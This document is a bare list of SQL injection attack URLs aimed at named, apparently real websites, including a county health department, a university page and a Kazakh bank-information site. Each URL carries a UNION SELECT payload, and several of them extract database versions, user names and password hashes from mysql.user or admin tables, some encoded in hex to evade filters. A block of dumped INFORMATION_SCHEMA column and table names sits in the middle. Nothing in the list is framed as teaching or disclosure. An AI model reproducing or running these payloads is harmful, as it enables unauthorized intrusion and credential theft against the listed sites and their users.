http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*

http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,2,3,4,5,6,USER(),version()/*

http://ethology.ru/humor/?id=-1+union+select+1,2,3,user(),DATABASE()/*

http://www.paintball.ru/next.php?id=430%20union%20select%201,2,COLUMN_NAME%20FROM+INFORMATION_SCHEMA.COLUMNS%20limit%200,1/*

CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN ID IS_DEFAULT IS_COMPILED SORTLEN TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME ORDINAL_POSITION COLUMN_DEFAULT IS_NULLABLE DATA_TYPE CHARACTER_MAXIMUM_LENGTH CHARACTER_OCTET_LENGTH NUMERIC_PRECISION NUMERIC_SCALE COLUMN_TYPE COLUMN_KEY EXTRA PRIVILEGES COLUMN_COMMENT GRANTEE PRIVILEGE_TYPE IS_GRANTABLE CONSTRAINT_CATALOG CONSTRAINT_SCHEMA CONSTRAINT_NAME POSITION_IN_UNIQUE_CONSTRAINT REFERENCED_TABLE_SCHEMA REFERENCED_TABLE_NAME  REFERENCED_COLUMN_NAME QUERY_ID SEQ DURATION CPU_USER CPU_SYSTEM CONTEXT_VOLUNTARY CONTEXT_INVOLUNTARY BLOCK_OPS_IN BLOCK_OPS_OUT MESSAGES_SENT MESSAGES_RECEIVED PAGE_FAULTS_MAJOR PAGE_FAULTS_MINOR SWAPS SOURCE_FUNCTION SOURCE_FILE SOURCE_LINE SPECIFIC_NAME ROUTINE_CATALOG ROUTINE_SCHEMA ROUTINE_NAME ROUTINE_TYPE DTD_IDENTIFIER ROUTINE_BODY ROUTINE_DEFINITION EXTERNAL_NAME EXTERNAL_LANGUAGE PARAMETER_STYLE IS_DETERMINISTIC SQL_DATA_ACCESS SQL_PATH SECURITY_TYPE CREATED LAST_ALTERED SQL_MODE ROUTINE_COMMENT DEFINER CATALOG_NAME SCHEMA_NAME DEFAULT_CHARACTER_SET_NAME DEFAULT_COLLATION_NAME NON_UNIQUE INDEX_SCHEMA INDEX_NAME SEQ_IN_INDEX COLLATION CARDINALITY SUB_PART PACKED NULLABLE INDEX_TYPE COMMENT TABLE_TYPE ENGINE VERSION ROW_FORMAT TABLE_ROWS AVG_ROW_LENGTH DATA_LENGTH MAX_DATA_LENGTH INDEX_LENGTH DATA_FREE AUTO_INCREMENT CREATE_TIME

CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS pb_cat pb_cat_tree pb_city pb_club pb_dealer pb_info pb_journal_obl pb_journal_st pb_kalendar pb_links pb_news pb_news_theme pb_portal pb_reviews pb_team pb_users

http://earthdata.com/newsarticle.php?id=430%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(user,0x78),0x78),AES_DECRYPT(AES_ENCRYPT(password,0x78),0x78),4,5,6%20from%20mysql.user

http://www.phfokc.com/show_press.php?id=430%20union%20select%201,2,version(),4/*

  http://www.eatmybrains.com/showfeature.php?id=430%20union%20select%201,2,3,name,5,version(),7,8,9,10,11,12,13,14,15,16%20from%20user/*

http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*

http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,3,concat(username,0x3a,password),5+from+meg.admin/*

http://latchmusic.com/1-2-3-music-store/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*

http://www.paradigma.kz/index.php?part=info&article_type_id=-1+union+select+1,VERSION(),database(),4,5,6,7,8,9,10,11,12,13/*

http://bankinfo.kz/rus/banks/bank.shtml?id_bank=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://sports.kz/news.php?type=small&id=-1+union+select+1,2,VERSION(),4,5,USER(),7,8/*